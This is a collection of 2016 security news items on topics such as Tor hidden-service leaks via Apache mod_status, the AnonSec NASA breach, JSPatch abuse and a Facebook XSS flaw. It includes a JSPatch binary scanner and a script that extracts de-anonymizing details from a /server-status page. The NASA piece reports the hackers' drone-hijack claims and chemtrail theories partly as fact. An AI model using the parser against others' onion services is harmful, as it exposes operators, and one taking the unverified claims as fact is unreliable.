Nexus device users are advised to patch the flaws by flashing their devices to this new build immediately. Users can also wait for the OTA (Over-the-Air) update that will be out in the next week or so.
Microsoft Starts automatically Pushing Windows 10 to all Windows 7 and 8.1 Users
2.2.2016
As warned last year, Microsoft is pushing Windows 10 upgrades onto its users' PCs much harder by re-categorizing Windows 10 as a "Recommended Update" in Windows Update, instead of an "optional update."
Microsoft launched Windows 10 earlier last year and offered the free upgrade to Windows 7 and Windows 8 and 8.1 users. While the company has been successful in getting Windows 10 onto more than 200 Million devices, Microsoft wants to be a lot more aggressive this year.
So, if you have enabled Automatic Windows Update on your Windows 7, 8 or 8.1 PC to install critical updates like security patches, you should watch your step, because…
...From Monday, Windows Update will start upgrading your PC to the newest Windows 10 as a recommended update, Microsoft confirmed.
This means the Windows 10 upgrade process will download and start on hundreds of millions of devices automatically.
The move is, of course, part of Microsoft's goal to get Windows 10 running on 1 Billion devices within 2-3 years of its release.
Market Share of Windows 10 is on the rise. It has already grabbed a market share of 11.85% as of January 2016, increasing from 9.96% in December. But, Windows 7 is still running on over 50% of all PCs in the world, so targeting even half of its user base would bring Microsoft very near to its goal.
"As we shared in late October on the Windows Blog, we are committed to making it easy for our Windows 7 and Windows 8.1 customers to upgrade to Windows 10," a Microsoft spokesperson said. "We updated the update experience today to help our clients, who previously reserved their upgrade, schedule a time for their upgrade to take place."
This means that if the 'Give me recommended updates the same way I receive important updates' option in the Windows Update section is enabled on your PC, the Windows 10 update will not only be downloaded but its installation will also be started automatically.
You also need to stay alert because even if you have opted for manual updates, you may still end up downloading Windows 10 anyway, as Windows Update automatically pre-selects the option for you, without you having to tick the box.
However, the company says that you won't be forced to upgrade to the creepy OS, as there will still be a prompt window requiring you to click through and confirm the Windows 10 upgrade after the files have silently been downloaded and unpacked in the background.
Even if the Windows 10 upgrade is accidentally completed, there is still a way to opt out of it. Microsoft is offering a 31-day grace period in which you will be able to revert to your old installation after trying Windows 10 and deciding you do not like the operating system.
Though we know this revert will also be an aggressive push by Microsoft.
NASA hacked by AnonSec that hijacked a $222m Global Hawk drone
2.2.2016
The AnonSec group hacked the NASA network and released a data dump online. The hackers also claim to have hijacked a Global Hawk drone.
Hackers belonging to the AnonSec group have released online 250GB of data stolen from NASA systems; the hackers also claimed to have hijacked a drone the agency uses to run high-altitude testing and sampling missions.
“So yeah, we know what you’re thinking, hacking NASA? How fucking cliche… If only I had a Dogecoin for every time someone claimed that, amiright?” the group wrote on PasteBin. ” Its like the boy who cried wolf but with hacking NASA instead lol But you might be surprised how low govt security standards can be, especially with a limited budget and clueless boomers controlling the network. NASA has been breached more times than most people can honestly remember (our favorites were Gary McKinnon && Mendax’s milw0rm) //you know, when people used to have legit reasons for their hacks. Reasons from searching for hidden evidence of UFO technology to protesting use of Uranium based rocket fuel ^_^”
The stolen data includes the names, email addresses and phone numbers of 2,414 NASA employees, as well as more than 2,000 flight logs and 600 video feeds from the aircraft used by NASA during its missions.
The AnonSec hackers didn’t break into the NASA systems themselves; they revealed that they paid other hackers for access to an agency system. AnonSec obtained a user account on a fully patched Debian machine and used it for lateral movement inside the agency’s systems.
In this case too, poor security aided the hackers, who scanned the NASA network for accounts using the login and password “root.”
Surprisingly, it took only a few tenths of a second to find systems with such poor configurations; by exploiting these systems the hackers built a map of the NASA network.
The AnonSec hackers breached the networks at NASA’s Glenn Research Center, Goddard Space Flight Center, and Dryden Flight Research Center.
Scanning the networks, they were able to gain full root access to three network-attached storage (NAS) devices used by the agency to store the aircraft flight logs.
The AnonSec group seems to be interested in finding evidence for the chemtrail conspiracy theory. According to the theory, some governments are using aircraft to spread chemical or biological agents to influence the weather for various purposes, including warfare.
“One of the main purposes of the Operation was to bring awareness to the reality of Chemtrails/CloudSeeding/Geoengineering/Weather Modification, whatever you want to call it, they all represent the same thing. NASA even has several missions dedicated to studying Aerosols and their affects (sic) on the environment and weather, so we targeted their systems,” the group states.
The hacking crew speculates that the US government is distributing heavy metals throughout the atmosphere to control the weather, and claims that these agents have a devastating effect on human health.
The group also explicitly links geoengineering to the genetically modified organisms (GMOs) produced by Monsanto.
“Here is a patent titled “Stress tolerant plants and methods thereof,” that is owned by Monsanto, and seems to address all forms of abiotic stress that weather manipulation and chemtrails can cause: Monsanto Drought and Abiotic Resistant Corn http://www.google.com/patents/US7851676”
“Since organic plants (non-GMO) can’t grow in harsh environments like GMOs they are forced to use Monsanto’s seeds,” the group said.
“However they are Terminator Seeds, which means they don’t reproduce any usable seeds for the farmer, they have to keep buying more. So no more independent farmers and Monsanto controls a majority of the food supply through the farmers.”
The group also claimed to have hijacked a Global Hawk drone used by NASA while it was flying over the Pacific.
According to the hackers, taking over the drone was easy: they discovered that the Global Hawk follows a flight plan provided by the control center in the form of a .gpx file uploaded to the vehicle.
Writing their own flight plan and uploading it to the drone was trivial. The hackers tried to crash the drone into the sea, but NASA controllers noticed the change in its path, took manual control and locked the hackers out of the system.
Default conf on Apache Web servers can de-anonymize your hidden service
2.2.2016
A default setting in Apache Web servers can de-anonymize the hidden service allowing an attacker to obtain details on the hosting.
An unnamed student discovered a serious issue affecting Apache web servers that could potentially de-anonymize .onion domains and servers hidden behind the Tor network. The student had reported the issue to the Tor Project development team some months earlier.
“Tor makes it possible for users to hide their locations while offering various kinds of services, such as web publishing or an instant messaging server. Using Tor “rendezvous points,” other Tor users can connect to these hidden services, each without knowing the other’s network identity. ” is the description provided by the official Tor Project for the hidden service protocol.
Websites hosted on the Tor network can run on any web server, including Apache, and in that case the anonymity of the operator is at risk.
The issue affects Apache installations on which the mod_status module is enabled by default. The student found that mod_status can disclose the real IP address behind a .onion domain, allowing attackers to de-anonymize onion servers.
The Apache status module (mod_status) lets administrators monitor an Apache web server through a page that displays current server statistics. The current server state includes the following information (items marked (*) are only shown when ExtendedStatus is On):
The number of workers serving requests
The number of idle workers
The status of each worker, the number of requests that worker has performed and the total number of bytes served by the worker (*)
A total number of accesses and byte count served (*)
The time the server was started/restarted and the time it has been running for
Averages giving the number of requests per second, the number of bytes served per second and the average number of bytes per request (*)
The current percentage CPU used by each worker and in total by Apache (*)
The current hosts and requests being processed (*)
When mod_status is enabled, its output is available at the URL http://website.com/server-status/, so a .onion domain served by that Apache instance may expose its 'server-status' page as well.
That page reveals sensitive backend data such as the server version, uptime, resource usage, total traffic, virtual hosts and active HTTP requests, which can be enough to work out where the server is located.
“On most distributions, Apache ships with a handy feature called mod_status enabled. It’s a page located at /server-status that displays some statistics, like uptime, resource usage, total traffic, enabled virtual hosts, and active HTTP requests. For security reasons, it’s only accessible from localhost by default.
This seems fairly reasonable, until you realize the Tor daemon runs on localhost. Consequently, any hidden service using Apache’s default config has /server-status exposed to the world. What could a malicious actor do in that case? They could spy on potentially sensitive requests. They could deduce the server’s approximate longitude if the timezone is set. They could even determine its IP address if a clearnet Virtual Host is present.” reads the blog post about the issue.
Operators of hidden services running on Apache need to disable mod_status to avoid disclosing their identity. Tightening the module's access control does not help, because the Tor daemon itself connects from localhost.
On Debian-based systems, disable the module and restart Apache with:
sudo a2dismod status
sudo service apache2 restart
Once the module is disabled, requests to /server-status return a 403 or 404 error.
Dutch Police Training Eagles to Take Down Rogue Drones
1.2.2016
You may have seen number of viral entertainment videos on the Internet, titled:
Hawk attacks Drone!
Angry Bird takes down Quadcopter,
and the best one…
Eagle attack: Drone Kidnapped by two Eagles,
...showing eagles, which are not the drones' natural predators, attacking and bringing down quadcopters when someone with a camera flies into their airspace.
Inspired by this:
The Dutch National Police force is training eagles to take down rogue drones, instead of shooting them down or using radio jammers, net-wielding interceptor drones or anti-drone rifles.
We already know the role Sniffer Dogs play for Anti-Bomb squads in detecting hidden bombs and weapons.
If dogs can be trained, so can eagles. With this in mind, this is the first time a police force has trained eagles to safely bring down rogue quadcopters in emergencies.
Dutch police reportedly collaborated with a raptor training company called 'Guard From Above' to train eagles to recognise drones and snatch them with their talons.
The police hope to have these trained eagles in service within the next few months.
Hacking Smartphones Running on MediaTek Processors
1.2.2016
A dangerous backdoor has been discovered in the MediaTek processor that could be exploited to hack Android devices remotely.
MediaTek is a Taiwan-based company that manufactures chips and processors used in smartphones and tablets.
The backdoor was discovered by security researcher Justin Case, who reported it to MediaTek via Twitter, as the chipset maker had no proper vulnerability reporting mechanism in place.
The vulnerability is apparently due to a debug feature that was opened up so that carriers could test devices on their networks, but was left enabled in shipped devices, leaving a serious backdoor open to attackers.
If exploited, the debug feature could allow hackers to compromise personal data of an Android device, including user’s private contacts, messages, photos, videos and other private data.
MediaTek acknowledged the issue, saying "We are aware of this issue, and it has been reviewed by MediaTek’s security team. It was mainly found in devices running Android 4.4 KitKat, due to a debug feature created for telecommunication inter-operability testing in China."
The issue resides in the MediaTek MT6582 processor, which is used in many popular Android devices.
If your smartphone uses this processor, the only thing you can do for now is keep the device off the Internet.
The company also said that it has notified all OEMs of the potential loophole, so it's now up to the affected OEMs to issue a security patch to close the backdoor.
"While this issue affected certain manufacturers, it also only affected a portion of devices for those manufacturers. We have taken steps to alert all manufacturers and remind them of this important feature," MediaTek spokesperson released a statement.
Audit shows Department of Homeland Security 6 billion U.S. Dollar firewall not so effective against hackers
1.2.2016
A multi-billion U.S. Dollar firewall run by the Department of Homeland Security meant to detect and prevent nation-state hacks against the government functions ineffectively, according to a sanitized version of a secret federal audit.
The National Cybersecurity Protection System (NCPS), also known as EINSTEIN, is a firewall run by the Department of Homeland Security. Its goal: to detect and prevent nation-state attacks against US government functions.
However, according to a sanitized version of a secret federal audit, EINSTEIN does an ineffective job. The audit was described in a ‘for official use only’ Government Accountability Office Report, which was sanitized (public version) and released on Thursday 28 January 2016.
In November 2015 the U.S. Senate Homeland Security and Governmental Affairs Committee suggested the then-confidential audit of EINSTEIN would prove the hacker surveillance system is not governmentwide.
The newly released audit strengthens their view and points out other misaligned objectives and technologies in the 6 billion U.S. Dollar EINSTEIN project (a figure not acknowledged by DHS).
Gregory C. Wilshusen , GAO director of information security issues, and Nabajyoti Barkakati, director of the GAO Center for Technology and Engineering, said in the report:
“Until NCPS’ intended capabilities are more fully developed, DHS will be hampered in its abilities to provide effective cybersecurity-related support to federal agencies,”
The intrusion prevention feature of the system is deployed at only 5 of the 23 major non-defense agencies.
The agencies covered by the audit were the Departments of Energy and Veterans Affairs, the General Services Administration, the National Science Foundation and the Nuclear Regulatory Commission. The audit report's findings are summarised below.
EINSTEIN does Not Cover Nation-State ‘Advanced Persistent Threats’
“The overall intent of the system was to protect against nation-state level threat actors,”
EINSTEIN did not protect against nation-state 'advanced persistent threats' (APTs) from foreign adversaries.
“EINSTEIN did not possess intrusion detection signatures that fully addressed all the advanced persistent threats we reviewed,”
In reaction to this DHS officials said EINSTEIN is only one technology of many that each department uses to protect its sensitive data. Every agency should keep its own IT and data safe, while DHS should provide the baseline protections and the big-picture perspective of security controls governmentwide.
EINSTEIN doesn’t Know Common Security Vulnerabilities
EINSTEIN works by sending out signatures of known attack patterns to 228 intrusion-detection sensors placed throughout the dot-gov network. These sensors analyze patterns in agency traffic flows to see if there is a match with any of the signatures.
“However, the signatures supporting NCPS’s intrusion detection capability only identify a portion of vulnerabilities associated with common software applications,”
Five client applications were reviewed (Adobe Acrobat, Flash, Internet Explorer, Java and Microsoft Office) and only 6 percent of the security bugs tested were flagged (29 of 489 vulnerabilities).
According to the report, one possible reason is that EINSTEIN's signatures are not synchronised with the National Vulnerability Database, the standard national database of security flaws maintained by NIST (National Institute of Standards and Technology).
DHS officials claim in the report this was not required for the first draft of EINSTEIN, but ‘acknowledges this deficiency’ and plan to address it in the future.
EINSTEIN has no Way to Spot Unknown Zero Days until ‘Announced’
The report states: “Regarding zero day exploits,” DHS officials stated, “there is no way to identify them until they are announced.” Once they are disclosed (sometimes with the help of intelligence community partners), DHS can craft a signature for the attack pattern and feed it into EINSTEIN.
Information Sharing with EINSTEIN is Often A Waste
“DHS’s sharing of information with agencies has not always been effective, with disagreement among agencies about the number of notifications sent and received and their usefulness,”
The reviewed agencies did not receive 24 percent of the notifications DHS said it had sent in fiscal 2014, and the ones that did arrive often served no purpose. Of the 56 alerts delivered, 31 were timely and useful; the rest were too slow, useless, false alarms or unrelated to intrusion detection.
Besides this, the DHS has created metrics related to EINSTEIN, “None provide insight into the value derived from the functions of the system,” the auditors said.
Conclusion
The findings of the audit show that EINSTEIN must change to be effective against hackers and foreign adversaries, its primary goal. Otherwise, 6 billion U.S. Dollars will have been spent on a system that is not up to its job, which endangers national security.
About the author
Cordny Nederkoorn
Software test engineer, Founder TestingSaaS, a social network about researching cloud applications with a focus on forensics, software testing and security.
Warning — Popular 'Hot Patching' Technique Puts iOS Users At Risk
1.2.2016
Did you know? An iOS app downloaded from Apple's official App Store can update its own code from a third-party server automatically, without your knowledge, if it embeds a hot-patching engine.
Yes, it is possible, and you could end up downloading malware on your iPhone or iPad.
Unlike Google, Apple has made remarkable efforts to create and maintain a healthy and clean ecosystem of its official App Store.
Although Apple's review process and standards for security and integrity are intended to protect iOS users, developers found the process time consuming and extremely frustrating while issuing a patch for a severe bug or security flaw impacting existing app users.
To get around this, third-party developers built hot-patching frameworks that let iOS app developers push hotfixes and updates straight to users without going through Apple's review process.
Sounds great, but here's the Kick:
Malicious app developers can abuse these frameworks to effectively circumvent the protection provided by the App Store review process and perform arbitrary actions on the device, FireEye has warned.
The framework in question is JSPatch – a small JavaScript-to-ObjectiveC engine that developers can integrate in their iOS apps, allowing them to apply hotfixes on their iOS apps simply by adding a few lines of code to their apps.
How Does JSPatch Work?
Once the JSPatch engine loads inside an application, the developer can configure the app always to load a JavaScript file hosted on a remote server, which is controlled by the developer.
Written by a Chinese developer, JSPatch is used in as many as 1,220 iOS apps in the App Store, according to the researchers. They did not name the apps but say they have already notified the app providers.
So, in need of security fixes or updates to their app, instead of going through Apple's long-winded update routine, developers can just add some JavaScript code to the file hosted on their server in order to load the code in all the devices where the app is installed.
How to Exploit the JSPatch Framework?
There are two ways to abuse this framework:
The developer has malicious intent.
The developer loads the patch script over an unencrypted channel, allowing man-in-the-middle attacks.
What if the app developer has bad intention?
A malicious developer can first submit a harmless JSPatch integrated application to the Apple App Store.
Once it passed Apple's inspection and made available on the App Store for users to download, the developer can then easily send malicious JavaScript code to the running application through JSPatch, allowing the developer to perform various actions without being detected.
"JSPatch is a boon to iOS developers," FireEye researchers said in a blog post. "In the right hands, it can be used to quickly and effectively deploy patches and code updates. However, in a non-utopian world like ours, we need to assume that bad actors will leverage this technology for unintended purposes."
What if the app's developer loads JSPatch via an unencrypted channel?
If an application developer uses JSPatch without any malicious intent, users' security is still at risk. Developers who load JSPatch scripts over an unencrypted (HTTP) channel leave the communication between client and server unprotected.
This could allow an attacker to conduct a man-in-the-middle (MitM) attack to intercept the client and server connection and tamper with the JavaScript content sent to the app in order to perform a malicious action, including:
Access to sensitive information, such as media files and the pasteboard content.
Change system properties.
Load arbitrary public frameworks into the app process.
This isn't the very first-time iOS users are facing such problems. Last October, hundreds of iOS apps in the App Store were found collecting user's private data while violating security and privacy guidelines of Apple.
The discovery came just a month after the XcodeGhost malware was distributed through legitimate iOS apps built with counterfeit versions of Apple's developer toolkit, Xcode.
How to Protect Yourself?
The recommendations to protect yourself against this flaw are standard:
Download only apps that you need, know and trust, and only from the official App Store.
Beware of applications that ask for an extensive amount of permissions and only grant the apps permissions that are necessary.
Manually review everything installed on your devices for anything suspicious. The rest is up to Apple: either make its app update process faster, or tolerate attack vectors that could affect many apps and their users.
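The two abuse paths above come down to a question an app reviewer or an enterprise mobile team can actually check: does this binary embed JSPatch, and where does it fetch its scripts from? The following Python script is an added example for this page, not FireEye's tooling. It does a `strings`-style scan of a decrypted Mach-O image (App Store binaries are FairPlay-encrypted until dumped from a device) for the engine's `JPEngine` class name and for script URLs, and rates the risk HIGH when a plaintext http:// URL is present. The sample byte blobs, hostnames and the indicator list are constructed for the example; `evaluateScript:` is deliberately not treated as evidence because Apple's own JavaScriptCore exposes the same selector.

```python
import re

# Strings that JSPatch leaves in an app binary: the engine's Objective-C class
# (JPEngine) and the framework name.  Indicator list is this example's assumption.
JSPATCH_INDICATORS = ("JPEngine", "JSPatch")

MH_MAGIC_64 = b"\xcf\xfa\xed\xfe"   # Mach-O 64-bit magic as it appears on disk

# Constructed stand-ins for a decrypted app binary (class names and URLs are
# invented; a real Mach-O is far larger, but the scan works the same way).
SAMPLE_JSPATCH_HTTP = (
    MH_MAGIC_64 + b"\x00" * 16
    + b"_OBJC_CLASS_$_JPEngine\x00evaluateScript:\x00"
    + b"http://patch.example.invalid/main.js\x00"
    + b"https://api.example.invalid/v1/\x00" + b"\x00" * 8
)
SAMPLE_JSPATCH_HTTPS = (
    MH_MAGIC_64 + b"\x00" * 16
    + b"_OBJC_CLASS_$_JPEngine\x00https://patch.example.invalid/main.js\x00"
)
SAMPLE_CLEAN = (
    MH_MAGIC_64 + b"\x00" * 16
    + b"_OBJC_CLASS_$_AppDelegate\x00https://api.example.invalid/v1/\x00"
)


def extract_strings(data, min_len=6):
    """Printable-ASCII runs of at least min_len bytes, like the `strings` tool."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.decode("ascii") for m in re.findall(pattern, data)]


def scan_for_jspatch(data):
    """Report whether a binary embeds JSPatch and where it may fetch scripts from."""
    if not data.startswith(MH_MAGIC_64):
        raise ValueError("not a 64-bit Mach-O image (or still FairPlay-encrypted)")
    strings = extract_strings(data)
    found = sorted(ind for ind in JSPATCH_INDICATORS
                   if any(ind in s for s in strings))
    urls = []
    for s in strings:
        urls.extend(re.findall(r"https?://[^\s\"'<>]+", s))
    insecure = sorted(u for u in urls if u.startswith("http://"))
    script_urls = sorted(u for u in urls if u.split("?", 1)[0].endswith(".js"))
    uses = bool(found)
    if uses and insecure:
        risk = "HIGH"      # hot-patch engine plus a plaintext fetch: MitM can inject code
    elif uses:
        risk = "MEDIUM"    # engine present: the developer can still push arbitrary code
    else:
        risk = "NONE"
    return {"uses_jspatch": uses, "indicators": found, "script_urls": script_urls,
            "insecure_urls": insecure, "risk": risk}


if __name__ == "__main__":
    for name, blob in (("http", SAMPLE_JSPATCH_HTTP),
                       ("https", SAMPLE_JSPATCH_HTTPS),
                       ("clean", SAMPLE_CLEAN)):
        print(name, scan_for_jspatch(blob))
```

A MEDIUM result is still worth a conversation with the developer: TLS only protects against the second abuse path, not against a developer who pushes malicious JavaScript after review.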
How Spy Agencies Hacked into Israeli Military Drones to Collect Live Video Feeds
1.2.2016
In a joint surveillance program, the US intelligence agency NSA (National Security Agency) and the British intelligence agency GCHQ (Government Communications Headquarters) hacked into, decrypted, and tracked live video feeds of Israeli Military Drones and Fighter Jets.
This could be one of the most shocking and embarrassing disclosures for Israel, who is the United States’ ally and prides itself on its technical capabilities.
Published by The Intercept, the newly released documents from former NSA contractor Edward Snowden reveal that in an operation dubbed "Anarchist", UK and US intelligence officials regularly accessed Israeli drone cameras, allowing them to watch live video feeds from drones and fighter jets while Israel bombed Gaza and spied on Syria.
But how were the intelligence officials able to do so?
How did the Intelligence Agencies Hack into Israeli Drones?
The documents reveal that the British intelligence agency installed military-grade interception systems at a Royal Air Force compound in the Troodos Mountains of Cyprus, which is geographically very close to Israel and Syria.
These surveillance tools are capable of intercepting analog video feeds from Israeli and Syrian drones.
With the help of open-source software such as ImageMagick and AntiSky, the agencies were able to descramble and convert the video from the remotely piloted aircraft in order to track the drones' movements.
The report includes several snapshots of Israeli drones collected in 2009 and 2010 that clearly indicate that Israel operates drones with missiles and attack capabilities, something Israel does not publicly acknowledge.
One snapshot published by The Intercept shows an Israeli IAI Heron drone, a high-altitude strike drone with a 350 kilometre range that can carry a 1-ton payload and stay aloft for more than 40 hours.
These leaked images are the first direct public evidence that Israel flies attack drones; on their own they are not conclusive, but they provide rare visual support for earlier reports.
For in-depth information, see The Intercept's full report.
Default Apache Configuration Can Unmask Tor Hidden Services
1.2.2016
Attention Tor Onion Hosters!
A year-old loophole in the Apache web server, uncovered by an unnamed computer science student, could potentially unmask the real identity of .onion domains and servers hidden behind the Tor network.
Although the loophole was reported on Reddit and to the Tor Project months ago, it only recently came to the limelight after a tweet by Alec Muffett, a well-known security engineer currently at Facebook.
What is a Tor hidden (.onion) service? Dark web sites (generally known as 'onion services') that use a special domain name ending in .onion are called Tor hidden services and are reachable only via the Tor network.
Tor hidden services are widely used by whistleblowers, underground markets, defense networks and others to maintain secrecy over the Internet.
An onion site can be hosted on top of any web server. But if you are choosing Apache, you need to think twice.
Apache Misconfiguration Exposes Tor Hidden Servers
According to the report, most distributions ship Apache with the mod_status module enabled by default, and that module can disclose the real identity of a .onion domain, placing onion servers at risk of being identified.
Apache's mod_status module lets server administrators monitor the health of the web server through an HTML interface and is, by default, accessible only from localhost.
When the module is enabled, its output is available at the URL http://website.com/server-status/.
However, running mod_status alongside a Tor hidden service exposes the 'server-status' page to the world, because the Tor daemon forwards hidden-service requests from localhost.
That page reveals sensitive backend data such as the server version, uptime, resource usage, total traffic, virtual hosts and active HTTP requests, which can be enough to work out where the server is located.
"What could a malicious actor do in that case? They could spy on potentially sensitive requests," reads the blog post regarding the issue. "They could deduce the server's approximate longitude if the timezone is set. They could even determine its IP address if a clearnet Virtual Host is present."
How to Disable mod_status on Apache
If you run a .onion domain on top of an Apache server, make sure that mod_status is disabled.
On Debian-based systems, run this command in a shell:
sudo a2dismod status
Here "a2" stands for Apache 2.x, "dis" for disable and "mod" for module. Restart Apache afterwards for the change to take effect.
After that, a request to /server-status is answered with a 403 or 404 error, which confirms that the page is no longer exposed.
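As an added example for the two mod_status articles above (it is not the student's or the Tor Project's code), here is a Python triage script that takes a captured /server-status page and pulls out exactly the details the blog post warns about: the server banner, the timezone in the Current Time line, the address the status page reports itself bound to, clearnet virtual hosts in the worker table, clients that did not arrive via the local Tor daemon, and the in-flight requests themselves. The HTML sample is constructed to mirror the layout Apache 2.4 renders, with placeholder hostnames and addresses; the assumption that the last three columns of the worker table are Client, VHost and Request is marked in the code.

```python
import re
from html import unescape

# Constructed sample, modelled on the HTML that Apache's mod_status renders at
# /server-status; hostnames and addresses are placeholders, not real systems.
SAMPLE_STATUS_PAGE = """<html><head><title>Apache Status</title></head><body>
<h1>Apache Server Status for example.onion (via 127.0.0.1)</h1>
<dl><dt>Server Version: Apache/2.4.10 (Debian)</dt>
<dt>Server Built: Jan 14 2016 12:00:00</dt>
<dt>Current Time: Monday, 01-Feb-2016 10:15:32 CET</dt>
<dt>Restart Time: Friday, 15-Jan-2016 08:00:00 CET</dt>
<dt>Server uptime: 17 days 2 hours 15 minutes 32 seconds</dt></dl>
<table border="0">
<tr><th>Srv</th><th>PID</th><th>Acc</th><th>M</th><th>CPU</th><th>SS</th><th>Req</th><th>Conn</th><th>Child</th><th>Slot</th><th>Client</th><th>VHost</th><th>Request</th></tr>
<tr><td><b>0-0</b></td><td>1201</td><td>0/12/345</td><td>W</td><td>0.12</td><td>3</td><td>10</td><td>1.2</td><td>0.45</td><td>2.3</td><td>127.0.0.1</td><td nowrap>example.onion:80</td><td nowrap>GET /server-status HTTP/1.1</td></tr>
<tr><td><b>1-0</b></td><td>1202</td><td>0/8/201</td><td>_</td><td>0.08</td><td>15</td><td>0</td><td>0.0</td><td>0.30</td><td>1.9</td><td>127.0.0.1</td><td nowrap>example.onion:80</td><td nowrap>POST /submit-document HTTP/1.1</td></tr>
<tr><td><b>2-0</b></td><td>1203</td><td>0/3/99</td><td>_</td><td>0.02</td><td>42</td><td>0</td><td>0.0</td><td>0.10</td><td>0.8</td><td>203.0.113.7</td><td nowrap>www.example-clearnet.net:80</td><td nowrap>GET /index.html HTTP/1.1</td></tr>
</table></body></html>"""

LOCAL_CLIENTS = ("127.", "::1")   # what a request relayed by the Tor daemon looks like


def _cells(row_html):
    """Text of every <td> in one table row, with inner tags removed."""
    cells = re.findall(r"<td[^>]*>(.*?)</td>", row_html, re.S)
    return [unescape(re.sub(r"<[^>]+>", "", c)).strip() for c in cells]


def _field(label, html):
    """Value of a 'Label: value' line such as 'Server Version: ...'."""
    m = re.search(label + r":\s*([^<\n]+)", html)
    return m.group(1).strip() if m else None


def analyze_server_status(html):
    """Pull the de-anonymising details out of a leaked /server-status page."""
    report = {
        "status_host": None, "via_address": None,
        "server_version": _field("Server Version", html),
        "timezone": None,
        "clearnet_vhosts": set(), "non_local_clients": set(), "requests": [],
    }
    m = re.search(r"Server Status for (\S+) \(via ([^)]+)\)", html)
    if m:
        report["status_host"], report["via_address"] = m.group(1), m.group(2)
    current_time = _field("Current Time", html)
    if current_time:
        # Last token is the zone abbreviation or offset, e.g. "CET"; the blog
        # post notes this narrows down the server's longitude.
        report["timezone"] = current_time.split()[-1]
    for row in re.findall(r"<tr>(.*?)</tr>", html, re.S):
        cells = _cells(row)
        if len(cells) < 3:            # header row (<th> only) or malformed
            continue
        client, vhost, request = cells[-3:]   # Apache 2.4 column order (assumed)
        host = vhost.rsplit(":", 1)[0]
        if not host.endswith(".onion"):
            report["clearnet_vhosts"].add(host)
        if not client.startswith(LOCAL_CLIENTS):
            report["non_local_clients"].add(client)
        report["requests"].append((vhost, request))
    for key in ("clearnet_vhosts", "non_local_clients"):
        report[key] = sorted(report[key])
    return report


def findings(report):
    """Human-readable summary of what the page gives away."""
    out = []
    if report["server_version"]:
        out.append("server banner: " + report["server_version"])
    if report["timezone"]:
        out.append("timezone leaked: " + report["timezone"])
    if report["via_address"]:
        out.append("status page bound to: " + report["via_address"])
    if report["clearnet_vhosts"]:
        out.append("clearnet vhosts (hostname/IP leak): " + ", ".join(report["clearnet_vhosts"]))
    if report["non_local_clients"]:
        out.append("non-Tor clients seen: " + ", ".join(report["non_local_clients"]))
    out.append("%d in-flight requests visible" % len(report["requests"]))
    return out


if __name__ == "__main__":
    for line in findings(analyze_server_status(SAMPLE_STATUS_PAGE)):
        print(line)
```

Run it against your own onion address (fetch /server-status through Tor, save the HTML, feed it in): an empty findings list apart from the request count means the module is genuinely off; anything else is what an attacker already has.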
27% of all detected malware appeared in 2015
1.2.2016
According to a new report from Panda Security, more than 84 million new malware samples were detected during 2015, 27% of all malware ever seen.
In 2015 security experts detected a record number of new malware samples: according to a report published by Panda Security, more than 84 million were collected.
It is an impressive number, corresponding to 27 percent of all malware ever created.
“Last year saw the greatest number of cyberattacks recorded around the world, with a total of 304 million samples, which means that more than a quarter of all malware samples ever recorded were produced in 2015 (27.63%).” states the report.
Looking more closely at the report, Trojans are the main threat, accounting for 51.45 percent, followed by viruses at 22.79 percent, worms at 13.22 percent, potentially unwanted programs such as adware at 10.71 percent and spyware at 1.83 percent.
The spike in the number of threats, despite improvements in antivirus solutions, is mainly caused by an intensification of malware authors' activity. Threat actors spread many variations of the same malware strain to evade detection, an approach made easy by automated tools that slightly modify the malicious code.
Fortunately, antivirus vendors are getting smarter improving detection mechanisms and a rapid information sharing that allows them to promptly respond to new threats.
Panda Security confirmed to have a dedicated infrastructure to share malicious code samples with other vendors.
Looking at the geography of infections, China remains the most infected country in the world (57.24%), with nearly 30% more infections than in 2014. Taiwan was second with an infection rate of 49.15%, followed by Turkey (42.52%).
New docs confirm CIA planned to kidnap Snowden
1.2.2016
Documents obtained by Denfri.dk media confirm rendition flight used Copenhagen Airport for mission to kidnap Edward Snowden.
According to documents obtained by the Danish media outlet Denfri.dk through a Freedom of Information Act suit in August 2015, the CIA was planning to kidnap Edward Snowden.
A CIA paramilitary team was operating in Copenhagen, ready to seize the whistleblower and fly him to the US on an aircraft already stationed in the city.
The CIA agents were following Snowden's movements, looking to exploit a trip to one of the European countries as the moment to kidnap him.
The presence of a CIA plane in Copenhagen was first reported in 2014 by The Register, it is a Gulfstream V, registered under the number N977GA.
“On the evening of 24 June 2013, as Snowden arrived in Moscow from Hong Kong intending to fly on to Cuba, an unmarked Gulfstream V business jet – tail number N977GA – took off from a quiet commercial airport 30 miles from Washington DC. Manassas Regional Airport discreetly offers its clients ‘the personal accommodations and amenities you can’t find at commercial airports’.” wrote The Register.
“Early next morning, N977GA was detected heading east over Scotland at the unusually high altitude of 45,000 feet. It had not filed a flight plan, and was flying above the level at which air traffic control reporting is mandatory.”
The same aircraft has been used by the CIA to transport captives to the CIA’s secret prisons set up since 9/11.
The documents obtained by the Denfri confirmed the circumstance revealing that Danish police and government officers approved the positioning of the CIA plane in Copenhagen for unspecified “state purposes.”
The documents include a government letter from FBI representatives asking for the support of the Norwegian government. The agency requested that Norwegian authorities immediately notify US intelligence agencies should Snowden cross into Norway, Finland, Sweden or Denmark.
The Danish intelligence has sought to preserve total secrecy in relation to the stationing of the CIA aircraft in Copenhagen .
“Denmark’s relationship with the USA would be damaged if the information [content redacted from the documents] becomes public knowledge,” The Denmark’s interior ministry told Denfri.
I think that kidnapping Snowden would be a serious error for US intelligence: according to former NSA Director Keith Alexander, Snowden downloaded more than 1 million secret US government documents, and it is likely that those documents are already in the hands of a network of journalists ready to disclose them in case of problems.
Facebook XSS could have allowed attackers to take over users’ accounts
1.2.2016
A security researcher has discovered a serious XSS flaw that could have allowed attackers to take over users’ Facebook accounts.
Security expert Jack Whitton reported a critical XSS vulnerability to Facebook that could have been exploited by hackers to take over users' Facebook accounts. The researcher reported the flaw to Facebook in July 2015, and the company fixed it in just 6 hours.
Facebook rewarded the expert $7,500 for the flaw under its bug bounty program.
The researcher's attack method has two main aspects: one related to content types and one related to a DNS issue.
Whitton first looked for a way to get an uploaded file interpreted as HTML, and found that under specific conditions this is possible simply by changing the file extension to .html.
He discovered that while the extensions of photos and videos uploaded to Facebook cannot be modified, the extensions of advertising images uploaded via the Ads Manager could be changed.
The expert embedded an XSS payload into a PNG image's IDAT chunk which, unlike Exif and iTXt data, was not stripped by Facebook.
